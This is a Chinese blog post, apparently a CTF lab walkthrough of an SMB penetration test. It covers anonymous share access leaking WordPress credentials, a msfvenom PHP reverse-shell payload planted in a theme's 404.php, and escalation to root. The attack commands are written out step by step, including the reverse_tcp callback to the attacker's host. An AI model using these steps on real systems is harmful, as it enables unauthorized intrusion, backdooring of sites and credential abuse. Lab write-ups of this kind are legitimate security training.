CTF图文讲解-smb渗透测试

最新推荐文章于 2024-04-14 18:09:56 发布
最新推荐文章于 2024-04-14 18:09:56 发布
阅读量1.1k 收藏 9
点赞数 3
分类专栏: 笔记 ctf 文章标签: 安全 经验分享 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441727/article/details/114546737
版权
笔记 同时被 2 个专栏收录
72 篇文章 17 订阅
订阅专栏
ctf
9 篇文章 4 订阅
订阅专栏

首先进行靶机发现

netdiscover -r 靶机IP网段

在这里插入图片描述
发现靶机172.16.101.38
在这里插入图片描述
扫描信息及版本

nikto -host IP

在这里插入图片描述

对靶机进行开放端口及版本号扫描,获取有用的信息。

nmap -sV 靶机IP

在这里插入图片描述发现22(ssh),80(http),445139(smb),3306(mysql)

然后我们进行详细扫描

nmap -A -T4 -v IP

在这里插入图片描述
发现smb版本号
在这里插入图片描述

然后我们进行dirb漏洞扫描

dirb http://IP:PORT

在这里插入图片描述
发现有个登录页面
在这里插入图片描述

我们打开
在这里插入图片描述
发现缺少密码
尝试进行弱密码爆破

在这里插入图片描述
发现不行,我们去寻找密码

首先我们讲一下什么是SMB协议
SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。
139445(TCP) - 文件和打印共享
一般来说我们都是通过139或445端口来进行文件共享,而这种文件共享的协议统称为smb协议。

然后我们使用kail对smb协议进行弱点分析并进行利用。
这里我们用smbclient

smbclient -L IP

不用空密码直接enther
在这里插入图片描述

我们分别进入print$,share$,IPC$查看。

在这里插入图片描述

发现share$下面有deets.txt和wordpress

在这里插入图片描述
get deets.txt下载deets.txt文件
在这里插入图片描述
进入wordpress
发现wp-config.php文件这个有用

注:wp-config.php文件是wordpress建站的配置文件,里面有wordpress的数据库信息,语言信息。

下载wp-config.php

get -wp-config.php

在这里插入图片描述
查看我们下载的文件
在这里插入图片描述

发现deets.txt里面有个密码12345先记下来。

查看wp-config.php
发现有Admin用户以及他的密码TogieMYSQL12345^^
在这里插入图片描述

发现用户和密码我们返回登录网页,进行登录

在这里插入图片描述
成功进去

发现有404.php并且可以修改

在这里插入图片描述
我们开始制作监听脚本

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.101.3 lport=4444 -f raw
lhost=kail的ip lport=监听的端口

在这里插入图片描述
把生成的脚本拿去更换404.php的代码
在这里插入图片描述
进入msf

加载监听模块

use exploit/multi/handler

在这里插入图片描述

配置命令

set payload php/meterpreter/reverse_tcp
set lhost kail的IP
set lport 监听端口
run	运行

在这里插入图片描述
lhost(kail的ip) lport(监听的端口) payload是按照你生成脚本来决定的。如你生成的linux那么这里就要对应linux’。php要对应php。不然无法监听成功。

然后访问404.php

http://172.16.101.38/wordpress/wp-content/themes/twentyfifteen/404.php

在这里插入图片描述
成功进入

输入shell进入终端界面,并进行优化。

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

查看当前用户

whoami

在这里插入图片描述
发现我们是www-data

尝试查看passwd获取更多信息

cat /etc/passwd

在这里插入图片描述

发现一个高权限用户togie

利用上面获得的密码进行登录
在这里插入图片描述
成功进入后尝试切换成root用户
在这里插入图片描述
成功,然后寻找flag.txt

Marx_Otto
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次SMB端口渗透测试
qq_35266419的博客
09-09 4670
一、SMB介绍 1. SMB(Server Message Block)通信协议是由微软(Microsoft)和英特尔(Intel)在1987年制订的协议,主要是作为Microsoft网络的通讯协议,,后来在Linux上移植了SMB,并成为samba。 2. SMB协议是基于TCP—NETBIOS下的,一般使用端口是139,445。 3. SMB协议,计算机可以访问网络资源,下载对应的资源文件 。...
CTF-7.SMB信息泄露
woo233的博客
09-13 544
SMB (Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445SMB协议,计算机可以访问网络资源,下载对应的资源文件对于开放139和445端口的机器一定要注意是否可以直接使用smbclient登录到共享目录查找敏感文件。
入门渗透:SMB入侵——Dancing
栉风沐雪的博客
02-01 619
SMB(全称是Server Message Block),被用于Web连接和客户端与服务器之间的信息沟通一般运行服务于445号端口,用于在计算机间共享文件、打印机、串口等SMB工作过程:版本协商 会话请求凭据 文件路径凭据 对共享资源进行操作在下文使用的是hackthebox的Dancing靶机。
[学习记录]内网应急实验——对SMB协议弱口令爆破事件进行日志分析
最新发布
渗透为止的博客
04-14 327
SMB协议弱口令爆破事件进行日志分析
SMB渗透测试常规思路
redwand的博客
02-08 4848
在互联网上,几乎所有的windows主机都开启了文件共享功能,这个功能是通过smb协议来实现的,因此,作为渗透测试工程师对于smb协议的理解必须要全面且深刻。
SMB渗透
weixin_42328919的博客
02-25 2789
SMB渗透学习过程 1.SMB介绍 SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。 百度百科 准备条件:kali 攻击机:192.168.31.101 靶场: 192.168...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
A-安全渗透测试报告模板.doc
05-15
一、对现有网站进行全面渗透测试,利用安全扫描器和渗透测试工具对网络中的重要的服务器、网络设备等进行非破坏性质的模拟黑客攻击,尝试入侵系统并获取系统信息,将入侵过程和技术细节产生进行报告,形成最终的渗透...
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
ctf拼图例题-puzzle
04-13
关于puzzle例题的原题资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
2.8 利用samba漏洞进行渗透
qq_55202378的博客
07-17 2243
samba漏洞
SMB信息泄露的利用
Scalzdp的专栏
11-17 730
SMB的协议出现较早,应用较广泛,但是早期计算机协议注重应用的快速建立,而对安全的要求并不太严格,所以很多较老的设备使用了存在漏洞的SMB协议,就会存在安全隐患。我们在SMB漏洞的利用中,主要还是基于msf提供的一些payload,这些payload其实都是别人做好了的,所以用起来特别方便,也从另一个方面反映如果有人要攻击利用SMB漏洞其实也很方便,所以我们在计算机安全防护上还需进行更多的考虑,必要的安全设置应该保留,不要为了一时方便,关闭所有安全防护的护盾。
文件共享服务的一些安全
qq_44005305的博客
08-23 376
文件共享是大家常用的一种功能,其实在win中的共享功能都是通过smb协议来完成。接下来看看文件共享有哪些需要注意的安全点,本文仅做一次记录,方便后续查看。
【废了-准备删除03】对445端口进行渗透测试——基于WAMP的drupal7.x管理系统
Fighting_hawk的博客
03-23 2737
1. 本节演示对目标主机445端口渗透测试。 2. 该测试需要得到目标主机用户账号或密码。此时可以通过后续漏洞利用获取到目标主机上的账户密码,或者通过密码爆破的方式碰碰运气。
网络安全渗透实战学习
Innocence_0的博客
10-16 1076
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所提供的写入权限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
web渗透测试----5、暴力破解漏洞--(3)FTP密码破解
七天
06-23 1655
FTP暴力破解
如何在cmd检测smb1协议是否启用
ysapfa的博客
06-15 1300
3.查看返回的结果。如果显示 "STATE" 的值为 "RUNNING",则表示SMB1协议已启用;如果显示 "STATE" 的值为 "STOPPED",则表示SMB1协议未启用或已停止。PS:请注意,SMB1协议存在一些安全风险,并且在最新版本的Windows操作系统中,默认情况下是禁用的。建议只在特殊情况下启用SMB1协议,并确保在安全的网络环境中使用。1.打开命令提示符(CMD):在开始菜单中搜索"cmd",然后点击打开命令提示符。
smb服务器速度测试_局域网的文件共享服务器---SAMBA的简易搭建
weixin_29556943的博客
12-24 1675
局域网的文件共享服务器---SAMBA的简易搭建SAMBA主要功能:1.共享文件2.共享打印机服务3.提供用户登录SAMBA主机时的身份验证,以提供不同身份用户的个别数据4.进行windows网络上的主机名解析(NetBIOS Name)5.共享设备(如zip CD-ROM)6.可直接编辑WWW主机上面的网页数据协议--- NtBIOS通讯协议Server:192.168.100.250假设条件...
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值